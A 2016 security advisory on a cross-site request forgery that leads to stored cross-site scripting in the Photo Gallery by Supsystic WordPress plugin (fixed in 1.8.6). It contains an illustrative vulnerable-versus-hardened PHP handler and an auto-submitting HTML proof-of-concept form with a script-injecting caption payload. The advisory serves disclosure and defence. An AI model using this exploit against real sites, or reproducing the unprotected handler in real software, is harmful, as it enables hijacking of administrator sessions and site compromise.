Umit Aksu, July 2016

Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the Photo Gallery by Supsystic WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29: a community summer event in which a large group of security bug hunters from around the world collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160722-0004

Tested versions

This issue was successfully tested on Photo Gallery by Supsystic WordPress Plugin version 1.8.5.

Fix

This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

Introduction

The Photo Gallery by Supsystic WordPress Plugin can be used to create portfolios and image galleries. A Cross-Site Scripting vulnerability was found in the Photo Gallery by Supsystic WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Details

It is possible to deliver a Cross-Site Scripting attack through Cross-Site Request Forgery. The caption text of a gallery image is vulnerable to stored Cross-Site Scripting: the caption is saved without sanitization and later rendered without output encoding. On its own this is normally only exploitable by a user who can already edit galleries (an administrator). However, the admin-ajax.php request that saves the image details (action=grid-gallery with route[module]=photos and route[action]=updateAttachment) carries no nonce or any other measure against Cross-Site Request Forgery, so any website visited by a logged-in administrator can submit that request in the administrator's name. Chaining the two issues, an attacker without an account can plant the script in the caption via Cross-Site Request Forgery, after which it runs wherever the caption is rendered.
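To make the two defects concrete, the following added example sketches an admin-ajax handler with the vulnerable shape described above next to a hardened version. It is illustrative code written for this page, not the Photo Gallery by Supsystic source and not the vendor's actual fix in 1.8.6; the function names, the meta key and the plain wp_ajax_ action name (instead of the plugin's route[module]/route[action] dispatcher) are assumptions. The WordPress functions used (check_ajax_referer, current_user_can, sanitize_text_field, esc_attr, esc_html, update_post_meta) are real core functions.

```php
<?php
// Illustrative only: this is NOT the Supsystic plugin code and NOT its 1.8.6 fix.
// Function names, the meta key and the wp_ajax_ action name are assumptions.

// --- Vulnerable shape: no nonce, no capability check, caption rendered raw -----

function pg_example_update_attachment_vulnerable() {
    $image_id = isset($_POST['image_id']) ? (int) $_POST['image_id'] : 0;
    $caption  = isset($_POST['caption']) ? wp_unslash($_POST['caption']) : '';

    // Any cross-site POST made by a logged-in administrator's browser lands here,
    // because nothing ties the request to a page the site itself rendered.
    update_post_meta($image_id, 'pg_example_caption', $caption);
    wp_send_json_success();
}

function pg_example_render_caption_vulnerable($image_id) {
    $caption = get_post_meta($image_id, 'pg_example_caption', true);
    // Stored XSS sink: the caption is written into an attribute unescaped, so a
    // value such as  x"><script>alert(1)</script>  closes the attribute and injects.
    return '<div class="pg-caption" data-caption="' . $caption . '">'
         . $caption . '</div>';
}

// --- Hardened shape: nonce + capability check on input, encoding on output -----

function pg_example_update_attachment_hardened() {
    // 1. CSRF: require a nonce that only a page rendered for this user carries.
    //    check_ajax_referer() terminates the request with -1 when the nonce in
    //    $_REQUEST['_ajax_nonce'] is missing or invalid.
    check_ajax_referer('pg_example_update_attachment', '_ajax_nonce');

    // 2. Authorization: the session cookie proves who the user is, not that the
    //    user may edit galleries. Check the capability explicitly.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    $image_id = isset($_POST['image_id']) ? absint($_POST['image_id']) : 0;
    $caption  = isset($_POST['caption'])
        ? sanitize_text_field(wp_unslash($_POST['caption']))
        : '';

    update_post_meta($image_id, 'pg_example_caption', $caption);
    wp_send_json_success();
}

function pg_example_render_caption_hardened($image_id) {
    $caption = get_post_meta($image_id, 'pg_example_caption', true);
    // 3. Output encoding at the sink is the actual XSS fix; the nonce only removes
    //    the cross-site trigger and input sanitization is defence in depth.
    return '<div class="pg-caption" data-caption="' . esc_attr($caption) . '">'
         . esc_html($caption) . '</div>';
}

// wp_ajax_ hooks fire only for authenticated users; the vulnerability in the
// advisory is that authentication alone was the only gate.
add_action('wp_ajax_pg_example_update_attachment', 'pg_example_update_attachment_hardened');

// The nonce is minted server-side into the admin page that hosts the edit form,
// e.g. inside that form:
//   wp_nonce_field('pg_example_update_attachment', '_ajax_nonce');
```

Two points worth keeping apart when triaging a report like this one: the missing nonce is what lets an unauthenticated attacker reach the save request, while the missing output encoding is what turns a saved caption into script execution. Fixing only the nonce leaves an XSS that any gallery editor can still plant; fixing only the encoding leaves a CSRF that lets an outside page silently rewrite image metadata. Default SameSite cookie handling in current browsers can blunt a top-level cross-site POST such as the proof of concept below, but it is not a substitute for the nonce.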

Proof of concept

<html>
   <body>
      <!-- Auto-submitting cross-site POST to the plugin's AJAX endpoint. The victim's
           browser attaches the WordPress session cookie; no nonce is required. -->
      <form method="post" action="http://<target>/wp-admin/admin-ajax.php">
         <!-- Payload: closes the attribute the caption is written into, then injects a script -->
         <input type="hidden" name="caption" value='this is the caption"><script>alert("From CSRF to XSS!");</script>'>
         <input type="hidden" name="captionEffect" value="quarter-slide-up">
         <input type="hidden" name="description" value="">
         <input type="hidden" name="alt" value="Capture">
         <input type="hidden" name="link" value="">
         <input type="hidden" name="cropPosition" value="center-center">
         <input type="hidden" name="replace_attachment_id" value="">
         <!-- Identifiers of the image, attachment and gallery to overwrite; adjust for the target site -->
         <input type="hidden" name="image_id" value="13">
         <input type="hidden" name="attachment_id" value="10">
         <input type="hidden" name="gallery_id" value="6">
         <!-- The plugin's own dispatcher: action=grid-gallery, routed to photos/updateAttachment -->
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="route[module]" value="photos">
         <input type="hidden" name="route[action]" value="updateAttachment">
      </form>
      <script>
         // Submit without user interaction as soon as the page loads
         document.forms[0].submit();
      </script>
   </body>
</html>